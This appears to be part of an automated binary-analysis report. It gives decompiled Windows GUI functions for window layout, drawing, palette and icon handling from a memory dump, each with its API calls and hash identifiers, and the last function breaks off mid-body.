                                                                        				void* _t179;
                                                                        				void* _t181;
                                                                        				intOrPtr _t182;
                                                                        				intOrPtr _t188;
                                                                        
                                                                        				_t146 = __ecx;
                                                                        				_t179 = _t181;
                                                                        				_t182 = _t181 + 0xffffffa8;
                                                                        				_t144 = __eax;
                                                                        				_t85 =  *((intOrPtr*)(__eax + 0x210));
                                                                        				if( *((intOrPtr*)(_t85 + 8)) == 0 ||  *((char*)(__eax + 0x220)) != 0) {
                                                                        					return _t85;
                                                                        				} else {
                                                                        					_t175 = GetDC(0);
                                                                        					_t89 = SelectObject(_t175, E0041F478( *((intOrPtr*)(_t144 + 0x68)), _t144, _t146));
                                                                        					GetTextMetricsA(_t175,  &_v92);
                                                                        					SelectObject(_t175, _t89);
                                                                        					ReleaseDC(0, _t175);
                                                                        					_t176 =  *( *((intOrPtr*)(_t144 + 0x210)) + 8);
                                                                        					_t147 =  *(_t144 + 0x21c);
                                                                        					asm("cdq");
                                                                        					_v8 = (_t176 + _t147 - 1) / _t147;
                                                                        					asm("cdq");
                                                                        					_v12 = ( *((intOrPtr*)(_t144 + 0x48)) - 0xa) / _t147;
                                                                        					_t148 = _v92.tmHeight;
                                                                        					_v24 =  *((intOrPtr*)(_t144 + 0x4c)) - _t148 - 5;
                                                                        					asm("cdq");
                                                                        					_v16 = _v24 / _v8;
                                                                        					asm("cdq");
                                                                        					_t34 = _v24 % _v8;
                                                                        					_t158 = _t34 >> 1;
                                                                        					if(_t34 < 0) {
                                                                        						asm("adc edx, 0x0");
                                                                        					}
                                                                        					_v20 = _t158 + _t148 + 1;
                                                                        					_v28 = BeginDeferWindowPos(_t176);
                                                                        					_push(_t179);
                                                                        					_push(0x42efd5);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t182;
                                                                        					_t113 =  *( *((intOrPtr*)(_t144 + 0x210)) + 8) - 1;
                                                                        					if(_t113 >= 0) {
                                                                        						_t117 = _t113 + 1;
                                                                        						_t188 = _t117;
                                                                        						_v36 = _t117;
                                                                        						_v24 = 0;
                                                                        						do {
                                                                        							_t119 = E00414208( *((intOrPtr*)(_t144 + 0x210)), _v24);
                                                                        							_t172 = _t119;
                                                                        							 *((intOrPtr*)( *_t119 + 0x70))();
                                                                        							asm("cdq");
                                                                        							_v32 = _v24 / _v8 * _v12 + 8;
                                                                        							if(E004037D8(_t119, _t188) != 0) {
                                                                        								_v32 = E00435FB0(_t144) - _v32 - _v12;
                                                                        							}
                                                                        							asm("cdq");
                                                                        							_v28 = DeferWindowPos(_v28, E0043CC2C(_t172), 0, _v32, _v24 % _v8 * _v16 + _v20, _v12, _v16, 0x14);
                                                                        							E004364CC(_t172, 1);
                                                                        							_v24 = _v24 + 1;
                                                                        							_t81 =  &_v36;
                                                                        							 *_t81 = _v36 - 1;
                                                                        						} while ( *_t81 != 0);
                                                                        					}
                                                                        					_pop(_t160);
                                                                        					 *[fs:eax] = _t160;
                                                                        					_push(0x42efdc);
                                                                        					return EndDeferWindowPos(_v28);
                                                                        				}
                                                                        			}
                                                                        0x0042efc3
                                                                        0x0042efc6
                                                                        0x0042efd4
                                                                        0x0042efd4

                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 0042EE76
                                                                          • Part of subcall function 0041F478: CreateFontIndirectA.GDI32(?), ref: 0041F5B6
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0042EE87
                                                                        • GetTextMetricsA.GDI32(00000000,?), ref: 0042EE93
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0042EE9A
                                                                        • ReleaseDC.USER32 ref: 0042EEA2
                                                                        • BeginDeferWindowPos.USER32 ref: 0042EEFA
                                                                        • DeferWindowPos.USER32(?,00000000,00000000,?,?,?,00000000,?), ref: 0042EFA1
                                                                        • EndDeferWindowPos.USER32(?,0042EFDC,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042EFCF
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: DeferWindow$ObjectSelect$BeginCreateFontIndirectMetricsReleaseText
                                                                        • String ID:
                                                                        • API String ID: 1262541054-0
                                                                        • Opcode ID: 218aff618e0d1c92c010e9e46c08f2c33b00da450782674677ceb1564e956cea
                                                                        • Instruction ID: f4d01097e73c3804610282b1e03a132fba9f815ae9591d249fd19601606493d4
                                                                        • Opcode Fuzzy Hash: 218aff618e0d1c92c010e9e46c08f2c33b00da450782674677ceb1564e956cea
                                                                        • Instruction Fuzzy Hash: B6414271A00119AFDB00DFA9C985AEEBBF5EF48304F154066F904E7391D7389D41CB64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 74%
                                                                        			E0045325C(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                                        				intOrPtr* _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr _v20;
                                                                        				short _v22;
                                                                        				intOrPtr _v28;
                                                                        				struct HWND__* _v32;
                                                                        				char _v36;
                                                                        				intOrPtr _t50;
                                                                        				intOrPtr _t58;
                                                                        				intOrPtr _t59;
                                                                        				intOrPtr _t60;
                                                                        				intOrPtr _t63;
                                                                        				intOrPtr _t64;
                                                                        				intOrPtr _t66;
                                                                        				intOrPtr _t68;
                                                                        				intOrPtr _t83;
                                                                        				void* _t88;
                                                                        				intOrPtr _t120;
                                                                        				void* _t122;
                                                                        				void* _t125;
                                                                        				void* _t126;
                                                                        				intOrPtr _t127;
                                                                        
                                                                        				_t123 = __esi;
                                                                        				_t122 = __edi;
                                                                        				_t125 = _t126;
                                                                        				_t127 = _t126 + 0xffffffe0;
                                                                        				_push(__ebx);
                                                                        				_push(__esi);
                                                                        				_v36 = 0;
                                                                        				_v8 = __eax;
                                                                        				_push(_t125);
                                                                        				_push(0x4534ec);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t127;
                                                                        				E00434E0C();
                                                                        				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2ec) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
                                                                        					_t50 =  *0x495a24; // 0x41d59c
                                                                        					E00406548(_t50,  &_v36);
                                                                        					E0040A17C(_v36, 1);
                                                                        					E00403DA8();
                                                                        				}
                                                                        				if(GetCapture() != 0) {
                                                                        					SendMessageA(GetCapture(), 0x1f, 0, 0);
                                                                        				}
                                                                        				ReleaseCapture();
                                                                        				 *(_v8 + 0x2ec) =  *(_v8 + 0x2ec) | 0x00000008;
                                                                        				_v32 = GetActiveWindow();
                                                                        				_t58 =  *0x47aaf8; // 0x0
                                                                        				_v20 = _t58;
                                                                        				_t59 =  *0x496c08; // 0x217094c
                                                                        				_t60 =  *0x496c08; // 0x217094c
                                                                        				E00414284( *((intOrPtr*)(_t60 + 0x7c)),  *((intOrPtr*)(_t59 + 0x78)), 0);
                                                                        				_t63 =  *0x496c08; // 0x217094c
                                                                        				 *((intOrPtr*)(_t63 + 0x78)) = _v8;
                                                                        				_t64 =  *0x496c08; // 0x217094c
                                                                        				_v22 =  *((intOrPtr*)(_t64 + 0x44));
                                                                        				_t66 =  *0x496c08; // 0x217094c
                                                                        				E004546C4(_t66,  *((intOrPtr*)(_t59 + 0x78)), 0);
                                                                        				_t68 =  *0x496c08; // 0x217094c
                                                                        				_v28 =  *((intOrPtr*)(_t68 + 0x48));
                                                                        				_v16 = E0044D650(0, 0x496c04, _t122, _t123);
                                                                        				_push(_t125);
                                                                        				_push(0x4534cc);
                                                                        				_push( *[fs:edx]);
                                                                        				 *[fs:edx] = _t127;
                                                                        				E004531AC(_v8);
                                                                        				_push(_t125);
                                                                        				_push(0x45342b);
                                                                        				_push( *[fs:edx]);
                                                                        				 *[fs:edx] = _t127;
                                                                        				SendMessageA(E0043CC2C(_v8), 0xb000, 0, 0);
                                                                        				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
                                                                        				do {
                                                                        					E004563FC( *0x496c04, _t122, _t123);
                                                                        					if( *((char*)( *0x496c04 + 0x9c)) == 0) {
                                                                        						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
                                                                        							E0045310C(_v8);
                                                                        						}
                                                                        					} else {
                                                                        						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
                                                                        					}
                                                                        					_t83 =  *((intOrPtr*)(_v8 + 0x24c));
                                                                        				} while (_t83 == 0);
                                                                        				_v12 = _t83;
                                                                        				SendMessageA(E0043CC2C(_v8), 0xb001, 0, 0);
                                                                        				_t88 = E0043CC2C(_v8);
                                                                        				if(_t88 != GetActiveWindow()) {
                                                                        					_v32 = 0;
                                                                        				}
                                                                        				_pop(_t120);
                                                                        				 *[fs:eax] = _t120;
                                                                        				_push(0x453432);
                                                                        				return E004531A4();
                                                                        			}



























                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                        • String ID:
                                                                        • API String ID: 862346643-0
                                                                        • Opcode ID: d23c847d7f57aea184321512c31775f2395633f8dc318a8c35cf2f43c479741c
                                                                        • Instruction ID: 1e7db2e0920272a233e48265ae69c26bb7b820731f5faa072b4b138cd3cd441e
                                                                        • Opcode Fuzzy Hash: d23c847d7f57aea184321512c31775f2395633f8dc318a8c35cf2f43c479741c
                                                                        • Instruction Fuzzy Hash: A8512E30A006449FDB00EF6AC946B9E77F5EF49745F1140BAF804AB3A2D778AE44DB48
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0043AD08(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
                                                                        				int _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v20;
                                                                        				struct tagRECT _v36;
                                                                        				signed int _t54;
                                                                        				intOrPtr _t59;
                                                                        				int _t61;
                                                                        				void* _t63;
                                                                        				void* _t66;
                                                                        				void* _t82;
                                                                        				int _t98;
                                                                        				struct HDC__* _t99;
                                                                        
                                                                        				_t99 = __edx;
                                                                        				_t82 = __eax;
                                                                        				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
                                                                        				_v16 = SaveDC(__edx);
                                                                        				E00434EE8(__edx, _a4, __ecx);
                                                                        				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
                                                                        				_t98 = 0;
                                                                        				_v12 = 0;
                                                                        				if((GetWindowLongA(E0043CC2C(_t82), 0xffffffec) & 0x00000002) == 0) {
                                                                        					_t54 = GetWindowLongA(E0043CC2C(_t82), 0xfffffff0);
                                                                        					__eflags = _t54 & 0x00800000;
                                                                        					if((_t54 & 0x00800000) != 0) {
                                                                        						_v12 = 3;
                                                                        						_t98 = 0xa00f;
                                                                        					}
                                                                        				} else {
                                                                        					_v12 = 0xa;
                                                                        					_t98 = 0x200f;
                                                                        				}
                                                                        				if(_t98 != 0) {
                                                                        					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
                                                                        					DrawEdge(_t99,  &_v36, _v12, _t98);
                                                                        					E00434EE8(_t99, _v36.top, _v36.left);
                                                                        					IntersectClipRect(_t99, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
                                                                        				}
                                                                        				E00437760(_t82, _t99, 0x14, 0);
                                                                        				E00437760(_t82, _t99, 0xf, 0);
                                                                        				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
                                                                        				if(_t59 == 0) {
                                                                        					L12:
                                                                        					_t61 = RestoreDC(_t99, _v16);
                                                                        					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
                                                                        					return _t61;
                                                                        				} else {
                                                                        					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
                                                                        					if(_t63 < 0) {
                                                                        						goto L12;
                                                                        					}
                                                                        					_v20 = _t63 + 1;
                                                                        					_v8 = 0;
                                                                        					do {
                                                                        						_t66 = E00414208( *((intOrPtr*)(_t82 + 0x19c)), _v8);
                                                                        						_t107 =  *((char*)(_t66 + 0x57));
                                                                        						if( *((char*)(_t66 + 0x57)) != 0) {
                                                                        							E0043AD08(_t66,  *((intOrPtr*)(_t66 + 0x40)), _t99, _t107,  *((intOrPtr*)(_t66 + 0x44)));
                                                                        						}
                                                                        						_v8 = _v8 + 1;
                                                                        						_t36 =  &_v20;
                                                                        						 *_t36 = _v20 - 1;
                                                                        					} while ( *_t36 != 0);
                                                                        					goto L12;
                                                                        				}
                                                                        			}

















                                                                        APIs
                                                                        • SaveDC.GDI32 ref: 0043AD1E
                                                                          • Part of subcall function 00434EE8: GetWindowOrgEx.GDI32(?), ref: 00434EF6
                                                                          • Part of subcall function 00434EE8: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 00434F0C
                                                                        • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043AD3F
                                                                        • GetWindowLongA.USER32 ref: 0043AD55
                                                                        • GetWindowLongA.USER32 ref: 0043AD77
                                                                        • SetRect.USER32 ref: 0043ADA3
                                                                        • DrawEdge.USER32(?,?,?,00000000), ref: 0043ADB2
                                                                        • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043ADD7
                                                                        • RestoreDC.GDI32(?,?), ref: 0043AE48
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0045DC38(void* __eax, void* __edx, void* __edi, void* __esi) {
                                                                        				char _v12;
                                                                        				int _v24;
                                                                        				int _v28;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				int _t53;
                                                                        				int _t55;
                                                                        				signed int _t60;
                                                                        				signed int _t63;
                                                                        				int _t82;
                                                                        				int _t84;
                                                                        				signed int _t89;
                                                                        				signed int _t92;
                                                                        				void* _t97;
                                                                        				void* _t113;
                                                                        
                                                                        				_t97 = __eax;
                                                                        				if(__edx == 0) {
                                                                        					E00412BA4(0, _t113, 0, __edi, __esi);
                                                                        					E00412BA4(1,  &_v12, 1, __edi, __esi);
                                                                        					SetMapMode(E00420730( *((intOrPtr*)(_t97 + 0x208))), 8);
                                                                        					SetWindowOrgEx(E00420730( *((intOrPtr*)(_t97 + 0x208))), _v28, _v24, 0);
                                                                        					_t53 = E00435FF4(_t97);
                                                                        					_t55 = E00435FB0(_t97);
                                                                        					SetViewportExtEx(E00420730( *((intOrPtr*)(_t97 + 0x208))), _t55, _t53, 0);
                                                                        					_t60 = E00435FF4(_t97);
                                                                        					_t63 = E00435FB0(_t97);
                                                                        					return SetWindowExtEx(E00420730( *((intOrPtr*)(_t97 + 0x208))), _t63 * _v52, _t60 * _v48, 0);
                                                                        				}
                                                                        				E00412BA4(E00412BA4(E00435FB0(__eax), _t113, 0, __edi, __esi) | 0xffffffff,  &_v12, 1, __edi, __esi);
                                                                        				SetMapMode(E00420730( *((intOrPtr*)(_t97 + 0x208))), 8);
                                                                        				SetWindowOrgEx(E00420730( *((intOrPtr*)(_t97 + 0x208))), _v28, _v24, 0);
                                                                        				_t82 = E00435FF4(_t97);
                                                                        				_t84 = E00435FB0(_t97);
                                                                        				SetViewportExtEx(E00420730( *((intOrPtr*)(_t97 + 0x208))), _t84, _t82, 0);
                                                                        				_t89 = E00435FF4(_t97);
                                                                        				_t92 = E00435FB0(_t97);
                                                                        				return SetWindowExtEx(E00420730( *((intOrPtr*)(_t97 + 0x208))), _t92 * _v52, _t89 * _v48, 0);
                                                                        			}



















                                                                        APIs
                                                                        • SetMapMode.GDI32(00000000,00000008), ref: 0045DC75
                                                                        • SetWindowOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045DC92
                                                                        • SetViewportExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045DCB5
                                                                        • SetWindowExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045DCE0
                                                                        • SetMapMode.GDI32(00000000,00000008), ref: 0045DD16
                                                                        • SetWindowOrgEx.GDI32(00000000,?,?,00000000), ref: 0045DD33
                                                                        • SetViewportExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045DD56
                                                                        • SetWindowExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045DD81
                                                                        Similarity
                                                                        • API ID: Window$ModeViewport
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 70%
                                                                        			E00421068(void* __ebx) {
                                                                        				struct HDC__* _v8;
                                                                        				struct tagPALETTEENTRY _v1000;
                                                                        				struct tagPALETTEENTRY _v1004;
                                                                        				struct tagPALETTEENTRY _v1032;
                                                                        				signed int _v1034;
                                                                        				short _v1036;
                                                                        				void* _t24;
                                                                        				int _t53;
                                                                        				intOrPtr _t60;
                                                                        				void* _t62;
                                                                        				void* _t63;
                                                                        
                                                                        				_t62 = _t63;
                                                                        				_v1036 = 0x300;
                                                                        				_v1034 = 0x10;
                                                                        				E004029BC(_t24, 0x40,  &_v1032);
                                                                        				_v8 = GetDC(0);
                                                                        				_push(_t62);
                                                                        				_push(0x421165);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t63 + 0xfffffbf8;
                                                                        				_t53 = GetDeviceCaps(_v8, 0x68);
                                                                        				if(_t53 >= 0x10) {
                                                                        					GetSystemPaletteEntries(_v8, 0, 8,  &_v1032);
                                                                        					if(_v1004 != 0xc0c0c0) {
                                                                        						GetSystemPaletteEntries(_v8, _t53 - 8, 8, _t62 + (_v1034 & 0x0000ffff) * 4 - 0x424);
                                                                        					} else {
                                                                        						GetSystemPaletteEntries(_v8, _t53 - 8, 1,  &_v1004);
                                                                        						GetSystemPaletteEntries(_v8, _t53 - 7, 7, _t62 + (_v1034 & 0x0000ffff) * 4 - 0x420);
                                                                        						GetSystemPaletteEntries(_v8, 7, 1,  &_v1000);
                                                                        					}
                                                                        				}
                                                                        				_pop(_t60);
                                                                        				 *[fs:eax] = _t60;
                                                                        				_push(E0042116C);
                                                                        				return ReleaseDC(0, _v8);
                                                                        			}















                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 00421096
                                                                        • GetDeviceCaps.GDI32(?,00000068), ref: 004210B2
                                                                        • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 004210D1
                                                                        • GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 004210F5
                                                                        • GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 00421113
                                                                        • GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 00421127
                                                                        • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 00421147
                                                                        • ReleaseDC.USER32 ref: 0042115F
                                                                        Similarity
                                                                        • API ID: EntriesPaletteSystem$CapsDeviceRelease
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E00421658() {
                                                                        				struct HINSTANCE__* _t145;
                                                                        				long _t166;
                                                                        				intOrPtr _t167;
                                                                        				intOrPtr _t186;
                                                                        				void* _t192;
                                                                        				BYTE* _t193;
                                                                        				BYTE* _t196;
                                                                        				intOrPtr _t197;
                                                                        				void* _t198;
                                                                        				intOrPtr _t199;
                                                                        
                                                                        				 *((intOrPtr*)(_t198 - 0x24)) = 0;
                                                                        				 *((intOrPtr*)(_t198 - 0x20)) = E004214CC( *( *((intOrPtr*)(_t198 - 0x10)) + 2) & 0x0000ffff);
                                                                        				_t192 =  *((intOrPtr*)(_t198 - 0xc)) - 1;
                                                                        				if(_t192 > 0) {
                                                                        					_t197 = 1;
                                                                        					do {
                                                                        						_t167 = E004214CC( *( *((intOrPtr*)(_t198 - 0x10)) + 2 + (_t197 + _t197) * 8) & 0x0000ffff);
                                                                        						if(_t167 <=  *((intOrPtr*)(_t198 - 0x1c)) && _t167 >=  *((intOrPtr*)(_t198 - 0x20)) && E004214D8( *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8,  *((intOrPtr*)(_t198 - 0x10)) + (_t197 + _t197) * 8, _t198) != 0) {
                                                                        							 *((intOrPtr*)(_t198 - 0x24)) = _t197;
                                                                        							 *((intOrPtr*)(_t198 - 0x20)) = _t167;
                                                                        						}
                                                                        						_t197 = _t197 + 1;
                                                                        						_t192 = _t192 - 1;
                                                                        						_t204 = _t192;
                                                                        					} while (_t192 != 0);
                                                                        				}
                                                                        				 *(_t198 - 0x40) =  *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8;
                                                                        				 *( *(_t198 + 8)) =  *( *(_t198 - 0x40)) & 0x000000ff;
                                                                        				( *(_t198 + 8))[1] = ( *(_t198 - 0x40))[1] & 0x000000ff;
                                                                        				 *((intOrPtr*)(_t198 - 0x2c)) = E004083E8(( *(_t198 - 0x40))[8], _t204);
                                                                        				 *[fs:eax] = _t199;
                                                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 0x10))( *[fs:eax], 0x42183f, _t198);
                                                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 8))();
                                                                        				E00421310( *((intOrPtr*)(_t198 - 0x2c)),  *((intOrPtr*)(_t198 - 0x2c)), _t198 - 0x38, _t198 - 0x34, _t192,  *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))), _t204,  *(_t198 + 8));
                                                                        				GetObjectA( *(_t198 - 0x38), 0x18, _t198 - 0x70);
                                                                        				GetObjectA( *(_t198 - 0x34), 0x18, _t198 - 0x58);
                                                                        				_t166 =  *(_t198 - 0x64) *  *(_t198 - 0x68) * ( *(_t198 - 0x60) & 0x0000ffff);
                                                                        				 *(_t198 - 0x3c) =  *(_t198 - 0x4c) *  *(_t198 - 0x50) * ( *(_t198 - 0x48) & 0x0000ffff);
                                                                        				 *((intOrPtr*)(_t198 - 0x18)) =  *(_t198 - 0x3c) + _t166;
                                                                        				 *(_t198 - 0x30) = E004083E8( *((intOrPtr*)(_t198 - 0x18)), _t204);
                                                                        				_push(_t198);
                                                                        				_push(0x42181c);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t199;
                                                                        				_t193 =  *(_t198 - 0x30);
                                                                        				_t196 =  &(( *(_t198 - 0x30))[_t166]);
                                                                        				GetBitmapBits( *(_t198 - 0x38), _t166, _t193);
                                                                        				GetBitmapBits( *(_t198 - 0x34),  *(_t198 - 0x3c), _t196);
                                                                        				DeleteObject( *(_t198 - 0x34));
                                                                        				DeleteObject( *(_t198 - 0x38));
                                                                        				_t145 =  *0x496714; // 0x400000
                                                                        				 *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) = CreateIcon(_t145,  *( *(_t198 + 8)), ( *(_t198 + 8))[1],  *(_t198 - 0x48),  *(_t198 - 0x46), _t193, _t196);
                                                                        				if( *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) == 0) {
                                                                        					E00420A80(_t166);
                                                                        				}
                                                                        				_pop(_t186);
                                                                        				 *[fs:eax] = _t186;
                                                                        				_push(E00421823);
                                                                        				return E00402774( *(_t198 - 0x30));
                                                                        			}

                                                                        APIs
                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 0042174A
                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 00421759
                                                                        • GetBitmapBits.GDI32(?,?,?), ref: 004217AA
                                                                        • GetBitmapBits.GDI32(?,?,?), ref: 004217B8
                                                                        • DeleteObject.GDI32(?), ref: 004217C1
                                                                        • DeleteObject.GDI32(?), ref: 004217CA
                                                                        • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 004217EC
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                        • String ID:
                                                                        • API String ID: 1030595962-0
                                                                        • Opcode ID: 0836e0556076b5f12d1ae0eb89dd1a5762be714dfc8aaf9dfb912e760cb5b2e7
                                                                        • Instruction ID: 013013fe9648ae5886e4b8230851134a27cb4e01da0e6262b179e60b3c39ad5f
                                                                        • Opcode Fuzzy Hash: 0836e0556076b5f12d1ae0eb89dd1a5762be714dfc8aaf9dfb912e760cb5b2e7
                                                                        • Instruction Fuzzy Hash: ED611875A00229AFCB00EFA9D881E9EBBF9FF48304B554466F804EB361D734AD51CB64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E00475338(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                        				char _v12;
                                                                        				char _v16;
                                                                        				intOrPtr _v20;
                                                                        				intOrPtr _v28;
                                                                        				void* _v32;
                                                                        				struct tagPOINT _v40;
                                                                        				void* _t55;
                                                                        				void* _t56;
                                                                        				signed char _t60;
                                                                        				struct HWND__* _t61;
                                                                        				void* _t64;
                                                                        				void* _t66;
                                                                        				struct HWND__* _t73;
                                                                        				signed short _t80;
                                                                        				void* _t89;
                                                                        				int _t93;
                                                                        				long _t106;
                                                                        				intOrPtr* _t112;
                                                                        				intOrPtr _t123;
                                                                        				intOrPtr _t124;
                                                                        				void* _t132;
                                                                        				signed char* _t141;
                                                                        				void* _t144;
                                                                        				void* _t145;
                                                                        				struct HWND__* _t148;
                                                                        				void* _t152;
                                                                        
                                                                        				_v16 = 0;
                                                                        				_t144 = __edx;
                                                                        				_t112 = __eax;
                                                                        				_push(_t152);
                                                                        				_push(0x475537);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t152 + 0xffffffdc;
                                                                        				E0043AFDC(__eax, 0, __edx, __eflags);
                                                                        				if(E00475568(_t112) == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t144 + 8)))) !=  *((intOrPtr*)(_t112 + 0x264))) {
                                                                        					L22:
                                                                        					_pop(_t123);
                                                                        					 *[fs:eax] = _t123;
                                                                        					_push(0x47553e);
                                                                        					return E00404348( &_v16);
                                                                        				} else {
                                                                        					_t124 =  *((intOrPtr*)(_t144 + 8));
                                                                        					_t55 =  *((intOrPtr*)(_t124 + 8)) - 0xfffffec9;
                                                                        					if(_t55 == 0) {
                                                                        						 *((char*)(_t112 + 0x295)) = 1;
                                                                        						goto L22;
                                                                        					}
                                                                        					_t56 = _t55 - 4;
                                                                        					if(_t56 == 0) {
                                                                        						_t57 = _t124;
                                                                        						_t141 =  *(_t124 + 0x14);
                                                                        						__eflags =  *_t141 & 0x00000001;
                                                                        						if(( *_t141 & 0x00000001) != 0) {
                                                                        							_t145 = E00477D88(_t112,  *((intOrPtr*)(_t57 + 0xc)));
                                                                        							_t60 =  *(_t145 + 0x18);
                                                                        							__eflags = _t60 - _t141[4];
                                                                        							if(_t60 < _t141[4]) {
                                                                        								_t61 =  *(_t145 + 0x14);
                                                                        								__eflags = _t61;
                                                                        								if(_t61 > 0) {
                                                                        									__eflags = _t61 - _t141[4];
                                                                        									if(_t61 <= _t141[4]) {
                                                                        										_t141[4] = _t61;
                                                                        									}
